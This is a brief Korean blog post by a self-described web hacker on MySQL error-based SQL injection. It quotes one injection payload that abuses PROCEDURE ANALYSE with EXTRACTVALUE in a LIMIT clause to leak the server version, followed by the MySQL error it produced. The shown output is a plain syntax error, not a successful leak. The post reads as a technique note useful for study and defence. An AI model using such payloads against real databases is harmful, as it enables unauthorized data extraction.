mysql error based sql injection

mysql error based sql injection

- H3X0R, s1ipper 팀 소속 웹해커 윤석찬(chr4n3) - 

---

오늘 또 대단한 걸 알아냈습니다. 

알아낸 주소는 바로 (http://tempuss.tistory.com/entry/Limit-%EC%A0%88%EC%97%90%EC%84%9C%EC%9D%98-SQL-Injection) 여기 입니다 :0

error based sql injection은 블라인드 인젝션보다 많은 정보를 제공합니다. 그래서 더 빠른 시간내에 많은 효과를 얻을 수 있어서 위험한 취약점 중 하나죠. 

mysql> select * from test limit 1 procedure analyse(extractvalue(1,concat(0x3a, version())),1);

ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'extractvalue(1,concat(0x3a, version())),1)' at line 1

네 이렇게 됩니다